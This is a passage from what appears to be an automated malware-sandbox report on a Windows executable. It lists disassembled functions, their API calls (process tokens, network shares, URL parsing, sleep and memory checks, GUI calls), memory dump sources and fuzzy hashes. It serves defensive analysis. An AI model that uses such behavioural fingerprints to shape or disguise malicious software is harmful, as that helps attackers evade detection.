                                                  • SetBkMode.GDI32(?,00000001), ref: 005A98E9
                                                  • GetStockObject.GDI32(00000005), ref: 005A98F1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Color$ModeObjectStockText
                                                  • String ID:
                                                  • API String ID: 4037423528-0
                                                  • Opcode ID: 723940cbcba8cdac05430562b9d66b982e341e1d3f0fb1dbe6460f8972429fc2
                                                  • Instruction ID: 7aaa9e510675ab8198d742ecd5b660efcca51c51b6ac6a74207a7874a57870e0
                                                  • Opcode Fuzzy Hash: 723940cbcba8cdac05430562b9d66b982e341e1d3f0fb1dbe6460f8972429fc2
                                                  • Instruction Fuzzy Hash: A4E06531244A94AEDB315B79AC0DBDD3F12BB16336F049219F6F5540E1C37146519B11
                                                  Function 005F162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 005F1634
                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,005F11D9), ref: 005F163B
                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005F11D9), ref: 005F1648
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,005F11D9), ref: 005F164F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CurrentOpenProcessThreadToken
                                                  • String ID:
                                                  • API String ID: 3974789173-0
                                                  • Opcode ID: 61f3ec583aae8a305f4d47368f699872c630031e996917c5dc11d8e78d4b1ca4
                                                  • Instruction ID: 79c233b10217a31db921fa0df345398200dd72f7eadbdb90cbe526f3ca3a177a
                                                  • Opcode Fuzzy Hash: 61f3ec583aae8a305f4d47368f699872c630031e996917c5dc11d8e78d4b1ca4
                                                  • Instruction Fuzzy Hash: FBE08631602A11DBD7301FA09D0DF9A3F7DBF447A1F145808F345CA080D6384442C758
                                                  Function 005ED858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 005ED858
                                                  • GetDC.USER32(00000000), ref: 005ED862
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005ED882
                                                  • ReleaseDC.USER32(?), ref: 005ED8A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: b39f0831727bf9809c0a739d3a53d4e34956402db496e6841202269bf2681d18
                                                  • Instruction ID: 19f16397ae64d1a5dc4b0538880fd634d14b67b412e6657f6bbe85ae46afcdef
                                                  • Opcode Fuzzy Hash: b39f0831727bf9809c0a739d3a53d4e34956402db496e6841202269bf2681d18
                                                  • Instruction Fuzzy Hash: F6E01AB1800605DFCF51AFA0D80C66DBFB2FB08720F109409F846E7250D7384902AF50
                                                  Function 005ED86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 005ED86C
                                                  • GetDC.USER32(00000000), ref: 005ED876
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005ED882
                                                  • ReleaseDC.USER32(?), ref: 005ED8A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: d81591147b05d797af840e475a83c09f1f7a17cf9ea378894c4536bac82544c6
                                                  • Instruction ID: f46251221d0e9f1b929719cf6a2106348e4ecebeaf2abe50fa48844ad00b9fa8
                                                  • Opcode Fuzzy Hash: d81591147b05d797af840e475a83c09f1f7a17cf9ea378894c4536bac82544c6
                                                  • Instruction Fuzzy Hash: B2E09A75C00605DFCF61AFA0D80C66DBFB6FB48721B149449F94AE7250D73959029F50
                                                  Function 00604D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00597620: _wcslen.LIBCMT ref: 00597625
                                                  • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00604ED4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Connection_wcslen
                                                  • String ID: *$LPT
                                                  • API String ID: 1725874428-3443410124
                                                  • Opcode ID: 19b04b2763c2683b5f8686ef5f61e64e8bca1d7a0a0008e396b5d12a539b46cd
                                                  • Instruction ID: e6bf2f59295f0ba39985e3b50a11c1d40b4d8ae42db100ce5c7e727ac0881add
                                                  • Opcode Fuzzy Hash: 19b04b2763c2683b5f8686ef5f61e64e8bca1d7a0a0008e396b5d12a539b46cd
                                                  • Instruction Fuzzy Hash: 519175B59442059FCB28DF54C484EAABBF6BF88304F158099E5069F3A2DB31ED45CB51
                                                  Function 005BE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 005BE30D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: 53e316d723fd74d7ea7af5e7b48bd9d6b8075cec613dfdb639fb6a3b029054c4
                                                  • Instruction ID: e5c58f07b39a6df99a987567053e38c7e18618581883097d9c8c7156ec680077
                                                  • Opcode Fuzzy Hash: 53e316d723fd74d7ea7af5e7b48bd9d6b8075cec613dfdb639fb6a3b029054c4
                                                  • Instruction Fuzzy Hash: 2F517D6190C10B9ACB117764C903BF96FE8FB44740F388D5CE096826A9DB34AC819E86
                                                  Function 00617771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(005E569E,00000000,?,0062CC08,?,00000000,00000000), ref: 006178DD
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                  • CharUpperBuffW.USER32(005E569E,00000000,?,0062CC08,00000000,?,00000000,00000000), ref: 0061783B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper$_wcslen
                                                  • String ID: <se
                                                  • API String ID: 3544283678-3959060996
                                                  • Opcode ID: a857909064eeecf27a1eb78aafee5188c34b4c32de86f2611cd402a8b8d69b80
                                                  • Instruction ID: 58982fac25b994a01baa2c8a562f40d092b98dd78b4433dc2909b5918e19cae4
                                                  • Opcode Fuzzy Hash: a857909064eeecf27a1eb78aafee5188c34b4c32de86f2611cd402a8b8d69b80
                                                  • Instruction Fuzzy Hash: 60617E3291411AEBCF04EBA4CC95DFDBB7ABF58300F584529F542A3191EF305A4ADBA0
                                                  Function 005AE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  • Opcode ID: 73b632c41b49a7ca151d15feeef77cc088818af3f7692c48a830940ddef435dd
                                                  • Instruction ID: 555205893d4ce5eee3a521ea4d157bdfe7bf9c92e98c653a182c8d83c3a01738
                                                  • Opcode Fuzzy Hash: 73b632c41b49a7ca151d15feeef77cc088818af3f7692c48a830940ddef435dd
                                                  • Instruction Fuzzy Hash: A2511139904286DFDF29DF29C486AFE7FA5FF66310F644059EC919B280D6349D42CBA0
                                                  Function 005AF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 005AF2A2
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 005AF2BB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemorySleepStatus
                                                  • String ID: @
                                                  • API String ID: 2783356886-2766056989
                                                  • Opcode ID: 1a08c1a02ccb8d68cfce0fe298f92f4427119168ecb260a2bbcf49cddfc058b2
                                                  • Instruction ID: 35b14632da03ad3ded6a9b0d094f4c27deb5c0526b2426db448c4a5b37998270
                                                  • Opcode Fuzzy Hash: 1a08c1a02ccb8d68cfce0fe298f92f4427119168ecb260a2bbcf49cddfc058b2
                                                  • Instruction Fuzzy Hash: 8E5167724187499BD720AF10DC8ABAFBBF8FBC5300F81884DF19941195EB708569CB66
                                                  Function 00615745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 006157E0
                                                  • _wcslen.LIBCMT ref: 006157EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper_wcslen
                                                  • String ID: CALLARGARRAY
                                                  • API String ID: 157775604-1150593374
                                                  • Opcode ID: dda1c184823e37add083aa7b2c67b6cf3c89d2c36178e9904a58e287722e5d15
                                                  • Instruction ID: f90a8482f3bfc23add7366da094ab14619eec54e93143bdabe4c04775635489b
                                                  • Opcode Fuzzy Hash: dda1c184823e37add083aa7b2c67b6cf3c89d2c36178e9904a58e287722e5d15
                                                  • Instruction Fuzzy Hash: F0417C31A0011ADFCB54DFA9C8859EEBBB6FF99324F144029E516A7391E7349D81CB90
                                                  Function 0060D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0060D130
                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0060D13A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CrackInternet_wcslen
                                                  • String ID: |
                                                  • API String ID: 596671847-2343686810
                                                  • Opcode ID: 2642f3e3a9f701c57459b0cf1a1577089deebf221efff816e5d6b1d7afa9e9c7
                                                  • Instruction ID: 91ad6a3b7f505521274ff95a8516eb38eaba895d82ab55d4f16017385591bdaf
                                                  • Opcode Fuzzy Hash: 2642f3e3a9f701c57459b0cf1a1577089deebf221efff816e5d6b1d7afa9e9c7
                                                  • Instruction Fuzzy Hash: 38313E71D0010AABCF15EFA4CC89AEF7FBAFF44340F000159F815A6262DB31AA06CB60
                                                  Function 0062356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00623621
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0062365C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyMove
                                                  • String ID: static
                                                  • API String ID: 2139405536-2160076837
                                                  • Opcode ID: 7e57729e1d0f250c89e2612b6be0f7e22805e8f3543f7ef468bb2315f61e296a
                                                  • Instruction ID: bd8396df83ebfe21420e290f7bd32e159e57a9f509f3cb2ad90402834da6c0ed
                                                  • Opcode Fuzzy Hash: 7e57729e1d0f250c89e2612b6be0f7e22805e8f3543f7ef468bb2315f61e296a
                                                  • Instruction Fuzzy Hash: D0318171110A14AEDB209F64DC40EFB77AAFF88720F109619F85597280DB35AD91DB60
                                                  Function 00624537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0062461F
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00624634
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: '
                                                  • API String ID: 3850602802-1997036262
                                                  • Opcode ID: a8640b612ec1386e43a1a5f9accd03b7a46ed12cfc70a58f08d0377e7eeda1e6
                                                  • Instruction ID: 07ee09e94e93bc32c3176f12613a282b750f2488137d75127e54322f03700f7c
                                                  • Opcode Fuzzy Hash: a8640b612ec1386e43a1a5f9accd03b7a46ed12cfc70a58f08d0377e7eeda1e6
                                                  • Instruction Fuzzy Hash: 95314A74A0171A9FDF14CFA9D990BDA7BB6FF49340F14406AE904AB341DB71A941CF90
                                                  Function 00593923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 005D33A2
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00593A04
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: IconLoadNotifyShell_String_wcslen
                                                  • String ID: Line:
                                                  • API String ID: 2289894680-1585850449
                                                  • Opcode ID: 67b5806fdd00ce215c8f89ad0fe4b6bbffd9a28342e4f5f32c6dc793a3a27460
                                                  • Instruction ID: dd26d2d2295345bb3ef597de0abdc2f3b5b492394ab03118bad6213752d157e8
                                                  • Opcode Fuzzy Hash: 67b5806fdd00ce215c8f89ad0fe4b6bbffd9a28342e4f5f32c6dc793a3a27460
                                                  • Instruction Fuzzy Hash: 3931D671408305ABCB21EB14DC49BEFBBD8BB81710F14492EF59A97191EB709648C7D2
                                                  Function 006231EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0062327C
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00623287
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: Combobox
                                                  • API String ID: 3850602802-2096851135
                                                  • Opcode ID: 46733d96fc2b73c80d3918c995a534ede4bc7dfc4e10162a7b4442adfc7c38b5
                                                  • Instruction ID: b6cb31b86caa5d51976a52d6737c6a3afb3d1416f24c2c68bc25f44672c4ef7f
                                                  • Opcode Fuzzy Hash: 46733d96fc2b73c80d3918c995a534ede4bc7dfc4e10162a7b4442adfc7c38b5
                                                  • Instruction Fuzzy Hash: 1A11D071301629AFEF219F54EC84EEB3B6BEB943A4F104128F918A7390D7359E518B60
                                                  Function 00623710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0059600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0059604C
                                                    • Part of subcall function 0059600E: GetStockObject.GDI32(00000011), ref: 00596060
